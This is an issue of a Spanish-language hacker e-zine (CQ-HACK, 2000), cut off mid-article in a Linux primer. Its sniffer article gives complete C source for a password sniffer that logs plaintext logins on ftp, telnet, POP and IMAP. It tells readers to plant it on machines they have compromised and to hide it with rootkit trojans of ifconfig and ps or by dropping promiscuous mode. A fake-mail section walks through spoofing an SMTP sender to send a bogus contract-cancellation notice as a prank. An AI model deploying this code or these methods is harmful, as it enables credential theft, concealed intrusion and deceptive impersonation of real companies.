                  .-'"'=;_                           ! mmmm hakear que     ¡
              |\.'-~`-.`-`;/|                        ! rico a aprender y   ¡
              \.` '.'~-.` './----------------------->! colaborar con este  ¡
              (\`,__=-'__,'/)                        ! noble e-zine        ¡          
           _.-'-.( d\_/b ).-'-._                     !---------------------¡
         /'.-'   ' .---. '   '-.`\
       /'  .' (=    (_)    =) '.  `\
      /'  .',  `-.__.-.__.-'  ,'.  `\
     (     .'.   V       V  ; '.     )              Frase de la revista :
     (    |::  `-,__.-.__,-'  ::|    )
     |   /|`:.               .:'|\   |               Desce 0 se aprende         
     |  / | `:.  CQ-HACK     :' |`\  |            y todos comenzamos de ahi         
     | |  (  :.             .:  )  | |             
     | |   ( `:.  Es El     :' )   | |                      
     | |    \ :.   EnZinE  .: /    | |        Fran the Mentor (El hack solitario)
     | |     \`:.         .:'/     | |
     ) (      `\`:.     .:'/'      ) (
     (  `)_     ) `:._.:' (     _(`  )
     \  ' _)  .'           `.  (_ `  /
      \  '_) /   .'"```"'.   \ (_`  /
       `'"`  \  (         )  /  `"'`            --------------------------------
   ___        `.`.       .'.'        ___     "      COLABORA A :                 "
 .`   ``"""'''--`_)     (_'--'''"""``   `.   "                                   "
(_(_(___...--'"'`         `'"'--...___)_)_)  "     Fran_the_mentor@hotmail.com   "
                                                www.geocities.com/Fran_the_mentor
                                               ----------------------------------                
     

              !  BIENVENIDOS A CQ-HACK   !
              !                          !
              !    SEGUNDA EDICION       !
              !                          !
              !  10 DICIEMBRE DEL 2000   !

________________________________________________________________________
________________________________________________________________________

Staff Oficial  :

... Fran the Mentor ... (El hack solitario)

Saludos a los Colaboradores:

 Raise , powertech , |||DrSolomon||| 

y a un amigo Tynaco

   DE VERDAD MUCHAS GRACIAS
________________________________________________________________________
________________________________________________________________________

                              Contenidos

*01* ---------------- Editorial                   Fran the Mentor      
*02* ---------------- sniffers                    RaiSe
*03* ---------------- Puertos                     Powertech
*04* ---------------- fake mail                   Fran the Mentor 
*05* ---------------- Cisne.bib.udec.cl           Fran the Mentor
*06* ---------------- INICIARSE EN LINUX          |||DrSolomon|||
*07* ---------------- Despedida                   Fran the Mentor 
________________________________________________________________________
________________________________________________________________________

*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.Editorial*.*.*.*.*.*.*.*.*.*.*.*.*.*.*..*

 Bueno aqui estoy de nuevo solo pero cada vez con mas colaboradores y ya 
 hay unos cuantos cabros que se estan interesando y colaborando (FELICITACIONES) 
 Bueno me despido y espero colaboraciones cauros para que todos aprendamos de todos
 por lo menos esta es la idea de mi revista y ¡¡¡¡¡¡ANIMENSE!!!!!! .

________________________________________________________________________
________________________________________________________________________
                    ------------------------------------
		    *02*	         Sniffers   	       *
		    ------------------------------------

1.- Que es un sniffer?

Un sniffer se podria resumir como un programa que lo que hace es capturar
todos los datos que pasan a traves de una tarjeta de red. Para ello se basa
en un defecto del protocolo ethernet (el que se usa normalmente en las redes
locales). Este protocolo lo que hace es mandar la informacion a todos los
ordenadores de la red, aunque no vaya dirigida a ellos, luego son los propios
ordenadores los que basandose en la cabecera del paquete ethernet aceptan el
paquete o no, segun vaya dirigido a ellos o no. Normalmente todas las redes
tienen este defecto, aunque se puede evitar, por ejemplo hay algunos hubs con
'inteligencia' que en redes en estrella lo que hacen es examinar el encabezado
de los paquetes ethernet para ver a que direccion van dirigidos, y mandar la
informacion solo a ese ordenador. Pues como decia, el ethernet normalmente
manda los paquetes de datos a todas las estaciones de la red, entonces lo que
hace el sniffer es poner la tarjeta en modo promiscuo (promiscuous mode). El
modo promiscuo significa que la tarjeta capturara todos los paquetes ethernet,
aunque no vayan dirigidos a ella.

2.- Como trabaja un sniffer?

Nos habiamos quedado en el modo promiscuo (hay que decir por cierto que algunas
tarjetas no aceptan el modo promiscuo, evitando asi la instalacion de sniffers),
bueno, pues una vez hecho esto lo que hace el sniffer es filtrar todos los pa-
quetes ethernet. Si el sniffer almacenara todos los datos que pasan por la tar-
jeta seria un lio impresionante, asi que lo que hace es examinar los paquetes
y mirar las peticiones a unos determinados puertos, como por ejemplo el 23 del
telnet, los mas comunes son el 21, el 23, el 110 y el 143. Luego toda la infor-
macion que se transmite en esa conexion durante unos determinados segundos, por
ejemplo 30, la almacena en un fichero de log. Al grabar los 30 primeros segun-
dos grabara el login y el password, ya que van en texto plano, a no ser que se
utilice algun sistema de encriptacion como kerberos, etc.

Asi que si por ejemplo tu has hackeado una maquina B (tienes que haberla
hackeado ya que necesitas ser root para colocar un sniffer), y una maquina C
hace un telnet a una maquina A (estando todas en la misma red local), tu captu-
raras el login y el password de la maquina A. Mola, no? :).

3.- Codigo fuente.
 
Aqui pego el codigo de un sniffer para linux bastante practico.

                    ---- cortar aqui ----

/*
LinSniffer 0.03 [BETA]
Mike Edulla
medulla@infosoc.com
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>


int openintf(char *);
int read_tcp(int);
int filter(void);
int print_header(void);
int print_data(int, char *);
char *hostlookup(unsigned long int);
void clear_victim(void);
void cleanup(int);


struct etherpacket
{
   struct ethhdr eth;
   struct iphdr  ip;
   struct tcphdr tcp;
   char buff[8192];
}ep;

struct
{
   unsigned long      saddr;
   unsigned long      daddr;
   unsigned short     sport;
   unsigned short     dport;
   int                bytes_read;
   char               active;
   time_t             start_time;
} victim;

struct iphdr  *ip;
struct tcphdr *tcp;
int s;
FILE *fp;

#define CAPTLEN 512
#define TIMEOUT 30
#define TCPLOG "tcp.log"

int openintf(char *d)
{
   int fd;
   struct ifreq ifr;
   int s;
   fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
   if(fd < 0)
   {
      perror("cant get SOCK_PACKET socket");
      exit(0);
   }
   strcpy(ifr.ifr_name, d);
   s=ioctl(fd, SIOCGIFFLAGS, &ifr);
   if(s < 0)
   {
      close(fd);
      perror("cant get flags");
      exit(0);
   }
   ifr.ifr_flags |= IFF_PROMISC;
   s=ioctl(fd, SIOCSIFFLAGS, &ifr);
   if(s < 0) perror("cant set promiscuous mode");
   return fd;
}

int read_tcp(int s)
{
   int x;
   while(1)
   {
      x=read(s, (struct etherpacket *)&ep, sizeof(ep));
      if(x > 1) 
      {
         if(filter()==0) continue;
         x=x-54;
         if(x < 1) continue;
         return x;
      }
   }
}

int filter(void)
{
   int p;
   p=0;
   if(ip->protocol != 6) return 0;
   if(victim.active != 0)   
      if(victim.bytes_read > CAPTLEN)
      {
         fprintf(fp, "\n----- [CAPLEN Exceeded]\n");
         clear_victim();
         return 0;
      }
   if(victim.active != 0)
      if(time(NULL) > (victim.start_time + TIMEOUT))
      {
         fprintf(fp, "\n----- [Timed Out]\n");
         clear_victim();
         return 0;
      }                                                                                                                  
   if(ntohs(tcp->dest)==21)  p=1; /* ftp */
   if(ntohs(tcp->dest)==23)  p=1; /* telnet */
   if(ntohs(tcp->dest)==110) p=1; /* pop3 */
   if(ntohs(tcp->dest)==109) p=1; /* pop2 */
   if(ntohs(tcp->dest)==143) p=1; /* imap2 */
   if(ntohs(tcp->dest)==513) p=1; /* rlogin */
   if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
   if(victim.active == 0)
      if(p == 1)
         if(tcp->syn == 1)
         {
            victim.saddr=ip->saddr;
            victim.daddr=ip->daddr;
            victim.active=1;
            victim.sport=tcp->source;
            victim.dport=tcp->dest;
            victim.bytes_read=0;
            victim.start_time=time(NULL);
            print_header();
         }  
   if(tcp->dest != victim.dport) return 0;
   if(tcp->source != victim.sport) return 0;
   if(ip->saddr != victim.saddr) return 0;
   if(ip->daddr != victim.daddr) return 0;
   if(tcp->rst == 1) 
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "\n----- [RST]\n");
      clear_victim();
      return 0;
   }
   if(tcp->fin == 1) 
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "\n----- [FIN]\n");
      clear_victim();
      return 0;
   }
   return 1;
}

   
int print_header(void)
{
   fprintf(fp, "\n");
   fprintf(fp, "%s => ", hostlookup(ip->saddr));
   fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));   
}

int print_data(int datalen, char *data)
{
   int i=0;
   int t=0;
   
   victim.bytes_read=victim.bytes_read+datalen;
   for(i=0;i != datalen;i++)
   {
      if(data[i] == 13) { fprintf(fp, "\n"); t=0; }
      if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
      if(t > 75) {t=0;fprintf(fp, "\n");}
   }
}


main(int argc, char **argv)
{
   s=openintf("eth0");
   ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
   tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);   
   signal(SIGHUP, SIG_IGN);
   signal(SIGINT, cleanup);
   signal(SIGTERM, cleanup);
   signal(SIGKILL, cleanup);
   signal(SIGQUIT, cleanup);
   if(argc == 2) fp=stdout;
   else fp=fopen(TCPLOG, "at");
   if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);}
   clear_victim();
   for(;;)
   {
      read_tcp(s);
      if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
      fflush(fp);      
   }   
}

char *hostlookup(unsigned long int in)
{ 
   static char blah[1024];
   struct in_addr i;
   struct hostent *he;
   
   i.s_addr=in;
   he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
   if(he == NULL) strcpy(blah, inet_ntoa(i));
   else strcpy(blah, he->h_name);
   return blah;
}

void clear_victim(void)
{
   victim.saddr=0;
   victim.daddr=0;
   victim.sport=0;
   victim.dport=0;
   victim.active=0;
   victim.bytes_read=0;
   victim.start_time=0;
}

void cleanup(int sig)
{
   fprintf(fp, "Exiting...\n");
   close(s);
   fclose(fp);
   exit(0);
}

 		---- cortar aqui ----

Ahora mismo esta configurado para guardar los logs en el fichero tcp.log, en
el mismo directorio en el que este el sniffer, y capturara los primeros 30
segundos de los puertos 21 (ftp), 23 (telnet), 109 (pop2), 110 (pop3), 143
(imap), 513 (rlogin) y 106 (poppasswd). Los parametros los puedes modificar
como quieras para logear otros puertos, mas segundos, etc.. Al ejecutarlo
tienes que poner el &, a modo de ./snif &, para que quede corriendo en
segundo plano.

4.- Como ocultar su presencia.

Si pones un sniffer y no tomas varias precauciones poco durara en el sistema.
Para empezar, si el administrador o cualquiera usa el comando ifconfig vera que
la tarjeta esta en modo promiscuo, lo cual puede mosquearle :). Con el comando
ifconfig -a y un sniffer instalado se veria algo como:

eth0      Link encap:Ethernet  HWaddr 00:00:1C:04:11:C6
          inet addr:10.10.10.1  Bcast:255.255.255.255  Mask:255.255.255.0
          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0
          TX packets:0 errors:0 dropped:0 overruns:0
          Interrupt:11 Base address:0x6800 

Para evitarlo puedes instalar un troyano del ifconfig, que encontraras en mu-
chos rootkits, y que lo que hacen es ocultar el modo promiscuo.

Tambien, como cualquier otro programa ejecutado en segundo plano, dejara su
huella al hacer un ps para ver los procesos. La solucion a esto es la misma que
con el ifconfig, instalar otro troyano (esta vez para el ps), que seguramente
encontraras en el mismo rootkit que el anterior ;). Sino te apetece andar bus-
cando rootkits por ahi tienes los dos en http://www.rootshell.com/, busca por
"linux rootkit" o "lrk".

Aun asi despues de haber instalado los troyanos es posible detectar el sniffer,
usando un programa que acceda directamente a la tarjeta y mire si el flag
promisc esta activado. Un programa como este ;) :

                       ---- cortar aqui -----

#include <stdio.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#if defined (__linux__)
#include <linux/if.h>
#else
#include <net/if.h>
#endif
#define size(p) (sizeof(p))

int dev_flags=0,
    device_flags=0,
    set_look_all=0;

int
main(int argc, char **argv) {
 struct ifreq ifreq, *ifr;
 struct ifconf ifc;
 char buf[BUFSIZ], *cp, *cplim;

 if(argc <= 1)
        set_look_all++;

 if((dev_flags = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
        fprintf(stderr, "An error occured establiashing while establishing a socket\n");
        perror("socket");
        exit(1);
 }

 ifc.ifc_len = sizeof(buf);
 ifc.ifc_buf = buf;

 if(ioctl(dev_flags, SIOCGIFCONF, (char *)&ifc) < 0) {
        perror("SIOCGIFCONF");
        exit(1);
 }
 ifr = ifc.ifc_req;
 cplim=buf+ifc.ifc_len;
 for(cp = buf; cp < cplim;
                cp += sizeof (ifr->ifr_name) + size(ifr->ifr_addr))
 {
                ifr = (struct ifreq *)cp;

                if(argv[1])
                        if(strcmp(ifr->ifr_name, argv[1]) && !set_look_all)
                                continue;

                ifreq = *ifr;
                if(ioctl(dev_flags, SIOCGIFFLAGS, (char *)&ifreq) < 0)
                {
                        fprintf(stderr, "SIOCGIFFLAGS: %s (get interface flags): %s\n", ifr->ifr_name,strerror(errno));
                        continue;
                }

                device_flags=0; device_flags = ifreq.ifr_flags;
                fprintf(stdout, "%s: ", ifreq.ifr_name);

                if((device_flags & IFF_PROMISC) != 0)
                        fprintf(stdout, "Promiscuous: Sniffer detected.\n");
                else
                        fprintf(stdout, "Not-Promiscous: No Sniffers detected.\n");

                if(!set_look_all)
                        exit(0);
                else
                        continue;

 }
 if(!set_look_all)
         fprintf(stdout, "%s: Unknown device.\n", argv[1]);

}

                  ---- cortar aqui ----

5.- Instalar un sniffer en modo no promiscuo.

Aunque suene raro instalar un sniffer en modo no promiscuo si que tiene utili-
dad (al menos para mi). La principal ventaja es que es casi imposible que lo
detecten, ya que al estar la tarjeta sin el flag promisc aunque pasen un sca-
nners de sniffers no lo detectaran, y ademas te ahorras de meter un troyano
para el ifconfig y demas preocupaciones. Por el contrario solo capturaras los
paquetes ethernet que vayan dirigidos a ese ordenador, asi que no podras pillar
passwords de otros ordenadores directamente. Pero aunque en principio no puedas
capturar passwords de otros ordenadores al final acabas pillando alguno. Me
explico.. el sniffer logeara las sesiones que se hagan al propio ordenador des-
de cualquier lugar de la red, por ejemplo, una conexion telnet. Para empezar
ya grabaras todos los logins y passwords de los usuarios que hagan un telnet (
incluido el root), y luego capturara los primeros 30 segundos del telnet, y
es muy raro que en esos 30 segundos algun usuario no haga un telnet o un ftp
a otra maquina (no tiene pq estar en la misma red local) quedando el login
y el password de la maquina remota en el log. Si vas a hacer esto lo mejor es
que configures el sniffer para que solo logee el puerto 23 (de telnet) y que
capture los primeros 60 segundos o asi, para que tengas mas posibilidades de
que alguien haga una conexion a otra maquina.

Para instalar el sniffer en modo no promiscuo lo que tienes que hacer ejecutar
el sniffer, quedando corriendo en segundo plano y con la tarjeta con el flag
promisc activado. Luego para quitar el promisc puedes seguir dos caminos, o
quitarlo tu directamente con el ifconfig (esto funciona en linux, en otros ni
idea), siendo la orden algo como: "ifconfig eth0 -promisc". O utilizar este
programa que aparecio en el numero 53 del ezine phrack y que hace exactamente
lo mismo.

                   ---- cortar aqui ----

/*
 *  This is really dumb program.
 *  Works on Linux, FreeBSD and Irix.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
  int sd;
  struct ifreq ifr;
  char *interface;
  int promisc;

  if (argc != 3) {
    printf("usage: %s interface 0|1\n", argv[0]);
    exit(1);
  }
  interface = argv[1];
  promisc = atoi(argv[2]);

  if ((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
    perror("socket");
    exit(1);
  }
  strncpy(ifr.ifr_name, interface, IFNAMSIZ);
  if (ioctl(sd, SIOCGIFFLAGS, &ifr) == -1) {
    perror("SIOCGIFFLAGS");
    exit(1);
  }
  printf("flags = 0x%x\n", (u_short)ifr.ifr_flags);
  if (promisc)
    ifr.ifr_flags |= IFF_PROMISC;
  else
    ifr.ifr_flags &= ~IFF_PROMISC;
  if (ioctl(sd, SIOCSIFFLAGS, &ifr) == -1) {
    perror("SIOCSIFFLAGS");
    exit(1);
  }
  close(sd);
}

		---- cortar aqui -----

________________________________________________________________________
________________________________________________________________________
        --------------Puertos por el colaborador------------
                             Powertech
________________________________________________________________________
________________________________________________________________________

 9               discard Dev/null    --Basura
  11              systat               Informacion sobre los usuarios
  13                                   La hora y fecha de maquina remota
  15              netstat              Mucha informacion sobre la red
  17/tcp          qotd                 Quote of the Day
  19              chargen Generador    de caracteres
  21              ftp                  Transferenciadeficheros
  22/tcp          ssh                  SSH Remote Login Protocol
  23              telnet               Loginypass
  25              smpt                 Para crear email.
  37              time                 La hora.
  38/tcp          rap                  RouteAccessProtocol
  39              rlp                  Localizacion del recurso
  42/tcp          name server          HostName Server
  43              whois                Informacion sobre la red objetivo
  49/tcp          tacacs               LoginHostProtocol(TACACS)
  50/tcp          re-mail-ck           RemoteMailCheckingProtocol
  53              domain               Nombre de la maquina remota
  63/tcp          whois++ whois++
  69/tcp          tftp                 TrivialFileTransfer
  70              gopher               Buscador de informacion con bugs ;o)
  79              finger               Mucha informacion sobre los usuarios
  80              http                 ServidorWeb
  88/tcp          kerberos             Kerberos
  107             rtelnet              Telnet remoto
  109/tcp pop2    PostOffice           Protocol-Version2
  110             pop3                 Email entrante Version3
  111/tcp sunrpc  SUN Remote           Procedure Call
  113/tcp auth            Authentication Service
  115/tcp sftp            Simple File Transfer Protocol
  117/tcp uucp-path       UUCP Path Service
  119             nntp            Grupos de noticias Usenet
  133/tcp statsrv         Statistics Service
  136/tcp profile         PROFILE Naming System
  137/tcp netbios-ns      NETBIOSNameService
  137/udp netbios-ns      NETBIOSNameService
  138/tcp netbios-dgm     NETBIOSDatagramService
  138/udp netbios-dgm     NETBIOSDatagramService
  139/tcp netbios-ssn     NETBIOSSessionService
  139/udp netbios-ssn     NETBIOSSessionService
  143/tcp imap            InternetMessageAccessProtocol (xploit remoto jeje)
  144/tcp news            NewS
  161/tcp snmp            SNMP
  194/tcp irc             InternetRelayChatProtocol
  213/tcp ipx             IPX
  220/tcp imap3           InteractiveMailAccessProtocolv3
  443             shttp           Otro servidor web teoricamente seguro
  512/udp biff            ndica a los usuarios que han recibido mail
  513/tcp rlogin          remote login
  513/udp who             who remoto y da info sobre la carga de la maquina
  514/tcp shell           Shell remota
  514/udp syslog
  515/tcp printer         spooler
  520             route           Protocolo de informacion routing
  529/tcp irc-serv        IRC-SERV


________________________________________________________________________
________________________________________________________________________
        --------------Fake Mail------------
                  Fran The Mentor 
________________________________________________________________________
________________________________________________________________________

 Esto se hace gracias a los servidores smtp (puerto 25) 

 Bueno esto consiste en ponerse un e-mail falso el que queramos . Y sirve
 para puro wuear o dar un gran susto 

Pasos a seguir para hacer un Fake Mail:

1)  Abrir el telnet y conectarnos a cualquier servidor smpt (puerto 25) como
 entelchile.net o chilesat.net 

En el caso de entelchile.net al conectarnos nos va a salir esto 

220 mta3.entelchile.net ESMTP server ready Sat, 26 Aug 2000 23:43:55 -0400

En el caso de Chilesat.net nos sale esto 

220 mail.chilesat.net ESMTP Service (NPlex 4.0.068) ready
___________________________________________________________________________

2) Ahora  ya estamos conectados a una de estas 2 direcciones y ahi hay que
  hacer lo siguiente :

mail from: scliente@ctcinternet.cl <------ponemos de donde viene 

El servidor nos contesta:

250 <scliente@ctcinternet.cl> .......... Sender Okay 

Ahora ponemos a quien le vamos a enviar el e-mail :

rcpt to:  b*******m@ironmaiden.com <------------ a quien se lo enviamos

El servidor nos contesta:

250 < b*******m@ironmaiden.com> ...... Recipiant Okay

Ahora ponemos:

data 

El servidor nos contesta:

354 Enter mail, end with "." on a line
_______________________________________________________________________________

3) Ahora nos queda puro hacer el e-mail y esto sigue asi 
_______________________________________________________________________________

Ahora escribimos:

To:   b*******m@ironmaiden.com 
From: scliente@ctcinternet.cl 
Subject: Cancelacion del contrato  <----- jua que dira al llegarle el mail
Bueno estimado cliente por el uso indebido de su plan y no cumplimiento de las normas
su contrato queda nulo le rogamos comunicarse lo antes posible con la gerencia de ctc
. <---------- El punto se usa para terminar el mail es importante ponerlo 

El servidor nos contesta:

 250 Mail send accepted

y ahora nos salimos:

quit <------ ya terminamos
______________________________________________________________________________

4) Esto es super simple , espero que se diviertan ajajaj pero antes hagan una 
prueba a un e-mail suyo  para ver si el servidor almacena o registra nuestro
ip si en este e-mail sale su ip en la cabecera  ese server no sirve pero 
entelchile.net ni chilesat.net registran nuestro ip no he probado con ctc.

 Hasta la proxima cauros pa la otra sera algo mejorcito .

ahhhhhh y a les tiro la lista de comandos que sepueden ejecutar en entel

220 mta3.entelchile.net ESMTP server ready Sat, 26 Aug 2000 23:43:55 -0400

mta3.entelchile.net

214-This SMTP server is a part of the InterMail E-mail system.  For
214-information about InterMail, please see http://www.software.com
214-
214-      Supported commands:
214-
214-           EHLO     HELO     MAIL     RCPT     DATA
214-           VRFY     RSET     NOOP     QUIT
214-
214-      SMTP Extensions supported through EHLO:
214-
214-           EXPN     HELP     SIZE
214-
214-For more information about a listed topic, use "HELP <topic>"
214 Please report mail-related problems to Postmaster at this site.
214-This SMTP server is a part of the InterMail E-mail system.  For
214-information about InterMail, please see http://www.software.com

Ahora el de Chilesat

220 mail.chilesat.net ESMTP Service (NPlex 4.0.068) ready

214-Valid SMTP commands:
214-  HELO, EHLO, NOOP, RSET, QUIT
214-  MAIL, RCPT, DATA, VRFY, EXPN, HELP, ETRN
214-For more info, use HELP <valid SMTP command>
214 end of help

HELP RCPT

214-Syntax: RCPT TO:<mailbox>
214-Syntax: RCPT TO:<mailbox> ORCPT=<xtext>
214-Syntax: RCPT TO:<mailbox> NOTIFY=NEVER
214-Syntax: RCPT TO:<mailbox> NOTIFY=<one or more of SUCCESS, DELAY, FAILURE>
214-Purpose: add a mail recipient to list of recipients
214 end of help

HELP MAIL 

214-Syntax: MAIL FROM:<mailbox>
214-Syntax: MAIL FROM:<mailbox> SIZE=<decimal number>
214-Syntax: MAIL FROM:<mailbox> BODY=<7BIT|8BITMIME>
214-Syntax: MAIL FROM:<mailbox> RET=<FULL|HDRS>
214-Syntax: MAIL FROM:<mailbox> ENVID=<xtext>
214-Syntax: MAIL FROM:<mailbox> AUTH=<xtext>
214-Purpose: Initiate a mail transaction and identify sender
214 end of help

HELP VRFY 

214-Syntax: VRFY <local mailbox>
214-Purpose: check local mailbox address for validity
214 end of help

HELP ETRN

214-Syntax: ETRN <domain name>
214-Syntax: ETRN @<domain name>
214-Purpose: request queue processing for specified domain or subdomains
214 end of help

HELP RSET

214-Syntax: RSET
214-Purpose: abort transaction in progress and reset server to initial state
214 end of help


________________________________________________________________________
________________________________________________________________________
  *05*  Entrar a ver como es es sistema de busqueda en la biblioteca
   de la universidad de concepcion por telnet 
________________________________________________________________________
________________________________________________________________________

host: Cisne.bib.udec.cl
puerto: telnet 
mode: vt100
login: opac 
y dale enter y llegas asta aca 

telnet (cisne)
 
 
           +                          BIENVENIDOS
          / .
        /_____.                          A LA
        | (*) |
        | OOO |              DIRECCION DE BIBLIOTECAS DE LA
       [_______]
        |     |                 UNIVERSIDAD DE CONCEPCION
        |  O  |
        |     |
        |  O  |          OOOO   OOOO        OOO                 OOOOO
        |     |           OOO   OOO         OOO               OOO   OOO
        |  O  |           OOO   OOO         OOO               OOO
        |     |           OOO   OOO     OOOOOOO     OOOOO     OOO
        |  O  |           OOO   OOO   OOO   OOO   OOO   OOO   OOO
        |     |           OOO   OOO   OOO   OOO   OOOOOOOOO   OOO
        |     |           OOO   OOO   OOO   OOO   OOO         OOO   OOO
    .-------------.         OOOOO       OOOOOOO     OOOOOO      OOOOO
 +--------------------------------------------------------------------+
 |        Visite nuestro Sitio Web en http://www.bib.udec.cl          |
 +--------------------------------------------------------------------+

IBM AIX Versión 4
(C) Copyrights de IBM y otras compañias 1982, 1996.
login:opac
UniVerse Command Language 9.4
(c) Copyright 1996 Vmark Software Inc. - All Rights Reserved
A.PUB8 logged on: Sun Oct 29 15:35:43 2000

___________________________________________________________________________
ya entraste ahora te hace esta pregunta y tu selecionas el que uses
___________________________________________________________________________

Por favor indique que terminal está utilizando.
 
 1. Terminal IBM3151
 2. Emulación WYSE 50, ADDS VP
 3. Emulación VT100
 4. WYSE 150, WYSE370 o WYSE99GT emulando VT220 o VT320
 5. Terminales DEC VT220 o VT320
 6. terminar (Logoff)
 
   Ingrese Selección> x

___________________________________________________________________________
Despues te hace una prueba DE   CARACTERISTICAS DE VIDEO DE SU TERMINAL 
para ver si se ve bien y ahora solo queda buscar lo que quieras en esta pantalla 
___________________________________________________________________________

                   U N I V E R S I D A D   D E   C H I L E
                DEPARTAMENTO DE INFORMATICA Y COMUNICACIONES  (DIC)
           SISTEMA DE SERVICIOS DE INFORMACION Y BIBLIOTECAS (SISIB)
 
 
 
 
          Bienvenido al Catálogo Colectivo de la Universidad de Chile
 
 
             Contiene el material bibliográfico de las Bibliotecas
             y los Centros de Documentación de nuestra Corporación
 
 
Para acceder al catálogo, digite BELLO
To access, type BELLO
 
 
 
 
Digital UNIX (biblios) (ttyp0)
 
login: bello
Current multiLIS version is: 11.2
 @0;0;1;0;0;2{ @ @PARTAMENTO DE INFORMATICA Y COMUNICACIONES  (DIC)
      © DRA Information Inc. 1999

Formule su búsqueda:
 
 
     lqqqq Tipo de búsqueda qqqqk lqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqk
     x AU =  Autor              x xTeclee una o varias materias en cualquierx
     x OC =  Organismo          x xorden y pulse RETORNO.                   x
     x TI =  Título             x x                                         x
     x TU =  Título uniforme    x xMateria buscada: La protección de las    x
     x PC =  Palabras clave     x x                 ballenas                x
     x CO =  Cota               x xTeclee         : proteccion ballena* O   x
     x CL =  Colección          x x                 ballena* proteccion O   x
     x ED =  Editor             x x                 ballena*                x
     x MA =  Materia            x x                                         x
     x TD =  Tipo de documento  ` xRETORNO = búsqueda precedente            x
     mqqqqqqqqqqqqqqqqqqqqqqqqqqj xF10     = consultar la ayuda general     x
                                  mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj

Formule su búsqueda: TI Radioaficionados 

       MATERIA alfab‚tica (Puede ser truncado)                           T¡tulos
   1.  RADIOACTIVIDAD -- MEDIDAS DE SEGURIDAD.                              1
 
   2.  RADIOACTIVIDAD -- PUBLICACIONES PERIODICAS.                          1
 
 > 3.  RADIOASTRONOMIA.                                                     7
 
   4.  RADIOBIOLOGIA.                                                       7
 
   5.  RADIOBIOLOGIA -- CONGRESOS.                                          3
 
   6.  RADIOCRISTALOGRAFIA.                                                 6
 
   7.  RADIODIAGNOSTICO.                                                   21
 
   1.  RADIOACTIVIDAD -- MEDIDAS DE SEGURIDAD.                              1
 
   2.  RADIOACTIVIDAD -- PUBLICACIONES PERIODICAS.                          1
 
   3.  RADIOASTRONOMIA.                                                     7
 
   4.  RADIOBIOLOGIA.                                                       7
 
   5.  RADIOBIOLOGIA -- CONGRESOS.                                          3
 
   6.  RADIOCRISTALOGRAFIA.                                                 6
 
   7.  RADIODIAGNOSTICO.                                                   21
 
   1.  RADIOACTIVIDAD -- MEDIDAS DE SEGURIDAD.                              1
   1.  RADIOACTIVIDAD -- MEDIDAS DE SEGURIDAD.                              1
 
 Y eso es todo hay harto pa buscar chao y hasta la proxima cauros 

____________________________________________________________________________
__________________________________________________________________________

 *06*    [INICIARSE EN LINUX]  by ||| DrSolomon|||
___________________________________________________________________________
___________________________________________________________________________

Hola quiero saludar a la revista cq-hack y a todos sus lectores, 
Este articulo esta destinado para todas las personas que no tiene idea lo que es linux (O_O).

1-Introduccion:

El autor de este s.o. es linus torvald y tambien con la ayuda y 
colaboracion desinteresada de cientos de colaboradores sin 
Conocerse con un mismo fin "Linux". En un principio (1993) linux 
solo se podia obtener por Internet y de hay comenzo todo, su
Licencia es GNU  esto significa que es gratis :) y no tendras 
que vender merca para pagar este s.o. lo que si te podrian
Cobrar serian las distribuciones ejemplo: RedHat, Debian, Corel,
Mandrake, Slackware, Caldera...etc. La mas ditribuida es la 
RedHat tambien hay mutaciones o intentos de unir a windows y 
linux  como winlinux que en realidad no son muy buenas ya que se
monta sobre windows de entre muchas otras cosas tanbien 
existen mini distribuciones que son muy interesantes como por 
ej: brutalware..., este sistema operativo te ofrece ser: 
multitarea, multiusuario, potente entorno grafico, alto 
rendimiento, conectividad.....etc, puedes ejecutarlo desde un 
viejo 386sx hasta un pentium 3..4 y tambien en G3,
alpha ...etc (podriamos llenar muchas lineas mas pero e tratado de 
reducir la informacion en lo mas posible.)

2-Instroduccion e instalacion:

Cuantas veces no has oido "tengo el linux pero nose
como instalarlo nose mucho de particiones"
bueno ahora tratare de resolvele el problema a 
todas esas personas (en la istalacion me refiero
al redhat x.x  por ser el mas difundido)es inportante
decir que el formato de paquetes que usa el red hat
(Red Hat Package Manager, o RPM) es mas conosido por RPM 
otro caso es el del winmodem como es bien savido que solo 
funcionan con un software especial.. [bueno si es asi te 
recomiendo que lo tires ala basura y que te compres un buen modem].  
Para empezar te recomiendo que agas una copia de seguridad 
de tu windows 9x, si tienes mas de un disco duro  no tendremos problemas,
en el caso que solo tengas un disco duro y que solo ocupa windows 
tendremos que hacerle un espacio a linux por ello tendremos que aser una
desfracmentacion del disco.
Para hacer una nueva particion en el disco sin destruir ningun dato hay 
usaremos en el FIPS en lugar del Fdisk (el FIPS biene en en la distribucion
del redhat y otras se ubica en el cd d:\redhat\Dosutils...).
(Una Linux Native y una Linux Swap)es importante destacar esto  las dos particiones 
Una vez paraticionado el h.d hay que arracar la instalacion del linux 
a qui hay dos  hay dos opciones 1 es que tu bios soporte el arranque desde 
